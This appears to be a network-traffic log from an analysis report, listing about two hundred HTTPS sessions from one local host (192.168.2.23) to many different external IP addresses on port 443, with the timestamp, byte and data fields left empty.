                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24624192.168.2.2344556158.87.101.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24625192.168.2.234890858.190.42.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24626192.168.2.233783662.165.246.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24627192.168.2.234367238.127.89.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24628192.168.2.2356738162.197.78.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24629192.168.2.2335504110.46.124.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24630192.168.2.234053681.187.173.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24631192.168.2.2339778168.147.125.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24632192.168.2.2345750208.253.148.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24633192.168.2.2335608151.71.127.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24634192.168.2.2352746108.74.246.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24635192.168.2.2356390120.15.230.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24636192.168.2.234497444.59.65.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24637192.168.2.2343816149.1.110.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24638192.168.2.234969054.141.218.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24639192.168.2.2345226146.226.24.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24640192.168.2.235262280.168.109.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24641192.168.2.2346198223.188.236.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24642192.168.2.23563784.133.104.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24643192.168.2.23453148.144.143.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24644192.168.2.2358506108.164.231.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24645192.168.2.2356842166.223.254.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24646192.168.2.2349744138.92.48.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24647192.168.2.2332856216.95.200.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24648192.168.2.234795475.171.252.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24649192.168.2.2355034188.202.61.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24650192.168.2.235714667.223.103.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24651192.168.2.2350342201.118.136.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24652192.168.2.2358712113.159.247.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24653192.168.2.233422895.42.41.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24654192.168.2.2335304207.233.193.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24655192.168.2.2354772169.119.107.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24656192.168.2.234790698.149.51.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24657192.168.2.233965282.42.226.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24658192.168.2.2342714158.216.20.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24659192.168.2.2355452207.208.245.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24660192.168.2.233291651.235.164.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24661192.168.2.2352466184.175.93.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24662192.168.2.2355970223.202.123.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24663192.168.2.2341714194.196.150.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24664192.168.2.236064493.233.175.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24665192.168.2.2339648170.17.117.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24666192.168.2.235757636.2.4.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24667192.168.2.235408685.170.104.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24668192.168.2.234196044.221.238.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24669192.168.2.2359672125.231.216.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24670192.168.2.2348002213.223.49.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24671192.168.2.234769219.159.45.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24672192.168.2.235120880.123.158.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24673192.168.2.235031223.190.136.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24674192.168.2.2355526185.107.32.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24675192.168.2.235780638.72.242.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24676192.168.2.2340690105.203.234.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24677192.168.2.234074499.227.91.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24678192.168.2.2335854147.196.253.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24679192.168.2.234546636.248.22.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24680192.168.2.234613464.125.96.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24681192.168.2.2347716190.173.153.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24682192.168.2.233430825.137.245.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24683192.168.2.2342326128.48.94.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24684192.168.2.236030865.13.28.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24685192.168.2.2334730176.183.9.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24686192.168.2.2341720107.238.196.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24687192.168.2.2344258212.162.182.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24688192.168.2.2340608133.63.114.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24689192.168.2.235847684.207.209.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24690192.168.2.2341876135.239.205.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24691192.168.2.23517928.238.82.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24692192.168.2.233642293.153.31.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24693192.168.2.2334552103.227.186.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24694192.168.2.233296261.33.183.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24695192.168.2.2357848148.166.67.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24696192.168.2.233389880.75.32.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24697192.168.2.2357328163.181.240.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24698192.168.2.2337582167.9.171.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24699192.168.2.2341678156.254.241.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24700192.168.2.233957251.98.31.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24701192.168.2.2346304221.159.51.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24702192.168.2.234901092.37.153.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24703192.168.2.234002441.54.129.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24704192.168.2.2342612143.202.197.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24705192.168.2.2360302144.202.78.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24706192.168.2.234396041.135.45.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24707192.168.2.2339690172.254.244.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24708192.168.2.234645893.94.101.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24709192.168.2.2360598204.22.238.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24710192.168.2.2348820122.48.138.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24711192.168.2.2351692179.139.224.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24712192.168.2.2355948114.67.57.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24713192.168.2.2352610166.150.103.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24714192.168.2.23344181.91.60.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24715192.168.2.233338034.196.104.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24716192.168.2.2347364126.126.107.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24717192.168.2.233420859.154.210.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24718192.168.2.2337604133.146.29.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24719192.168.2.2359406154.183.44.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24720192.168.2.234095624.33.145.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24721192.168.2.2354124139.63.156.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24722192.168.2.23513265.48.175.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24723192.168.2.233874262.188.236.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24724192.168.2.2335582124.200.8.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24725192.168.2.2341228185.206.145.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24726192.168.2.2347594166.239.238.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24727192.168.2.2335390118.207.16.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24728192.168.2.234668078.144.225.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24729192.168.2.2348656165.93.222.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24730192.168.2.2335870171.46.27.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24731192.168.2.235009871.88.194.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24732192.168.2.2357478162.181.10.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24733192.168.2.23462561.216.101.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24734192.168.2.2337226120.10.49.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24735192.168.2.2339836114.132.17.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24736192.168.2.234386687.47.33.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24737192.168.2.2360738152.202.90.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24738192.168.2.234463414.130.228.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24739192.168.2.235267420.76.126.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24740192.168.2.235785071.33.79.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24741192.168.2.235637877.232.4.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24742192.168.2.2347286123.207.42.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24743192.168.2.2355886202.202.63.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24744192.168.2.233712242.147.75.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24745192.168.2.2336614171.176.79.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24746192.168.2.234532654.28.151.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24747192.168.2.235415887.222.247.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24748192.168.2.2348038126.145.145.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24749192.168.2.235586058.6.252.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24750192.168.2.233369497.38.221.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24751192.168.2.234851081.86.173.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24752192.168.2.2351866158.137.247.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24753192.168.2.2338264189.32.35.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24754192.168.2.2349856211.236.194.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24755192.168.2.236013886.198.115.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24756192.168.2.233380472.90.64.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24757192.168.2.235018046.41.230.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24758192.168.2.23513428.74.41.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24759192.168.2.235602213.162.149.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24760192.168.2.234885078.199.155.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24761192.168.2.2332900108.92.121.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24762192.168.2.2345074170.46.74.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24763192.168.2.234637874.82.170.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24764192.168.2.235088637.204.89.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24765192.168.2.2342106165.18.99.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24766192.168.2.2360816104.31.114.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24767192.168.2.2349358106.41.107.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24768192.168.2.234391847.182.238.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24769192.168.2.2343272184.146.151.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24770192.168.2.2339644108.45.239.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24771192.168.2.2351500131.194.87.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24772192.168.2.234131891.81.192.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24773192.168.2.233545217.4.128.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24774192.168.2.2359144186.25.49.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24775192.168.2.2340506176.64.152.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24776192.168.2.2342154185.166.69.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24777192.168.2.234017086.215.180.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24778192.168.2.234141852.50.142.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24779192.168.2.235915087.19.196.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24780192.168.2.2352162107.96.131.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24781192.168.2.2345886128.29.174.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24782192.168.2.2337068111.146.12.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24783192.168.2.235800846.134.202.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24784192.168.2.235414869.87.121.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24785192.168.2.2353638189.2.63.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24786192.168.2.2348512122.188.54.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24787192.168.2.233678077.174.178.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24788192.168.2.235030465.215.108.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24789192.168.2.2359908137.245.159.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24790192.168.2.234294418.195.241.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24791192.168.2.2343246192.252.83.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24792192.168.2.234810462.99.225.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24793192.168.2.2349474108.178.221.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24794192.168.2.2344386201.109.39.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24795192.168.2.2348568212.244.249.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24796192.168.2.2358714219.50.127.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24797192.168.2.2353148171.50.53.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24798192.168.2.2346652113.157.143.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24799192.168.2.235453420.210.148.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24800192.168.2.2334764222.92.226.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24801192.168.2.2338946174.4.184.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24802192.168.2.2351206188.104.209.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24803192.168.2.233808068.200.26.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24804192.168.2.234364831.251.55.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24805192.168.2.235297638.93.185.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24806192.168.2.2344690213.162.83.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24807192.168.2.2339812187.91.211.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24808192.168.2.235172444.9.14.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24809192.168.2.2358904164.101.237.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24810192.168.2.236050892.27.21.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24811192.168.2.2342058216.42.150.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24812192.168.2.2352554186.244.45.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24813192.168.2.2346414159.21.28.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24814192.168.2.233532484.163.29.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24815192.168.2.2349308116.52.148.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24816192.168.2.235918485.202.104.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24817192.168.2.23601904.137.235.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24818192.168.2.2353470210.32.110.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24819192.168.2.2347956148.96.54.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24820192.168.2.2360120106.43.57.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24821192.168.2.2347160179.205.101.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24822192.168.2.233588685.80.195.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24823192.168.2.233742488.123.52.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24824192.168.2.2358000148.27.223.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24825192.168.2.2354568135.253.119.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24826192.168.2.234635265.196.239.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24827192.168.2.235107432.118.79.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24828192.168.2.235118823.153.81.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24829192.168.2.234959686.72.255.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24830192.168.2.2337358100.8.101.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24831192.168.2.2334852145.58.162.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24832192.168.2.2357906139.80.195.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24833192.168.2.2335464117.250.131.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24834192.168.2.235052236.212.240.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24835192.168.2.234389062.154.207.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24836192.168.2.2344028104.131.219.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24837192.168.2.233381463.36.224.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24838192.168.2.233403820.218.204.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24839192.168.2.235595498.193.144.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24840192.168.2.234368024.148.158.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24841192.168.2.234402495.246.153.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24842192.168.2.2347352188.137.162.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24843192.168.2.2355402126.52.28.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24844192.168.2.235046470.61.183.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24845192.168.2.2357740202.223.222.144443
                                          TimestampBytes transferredDirectionData


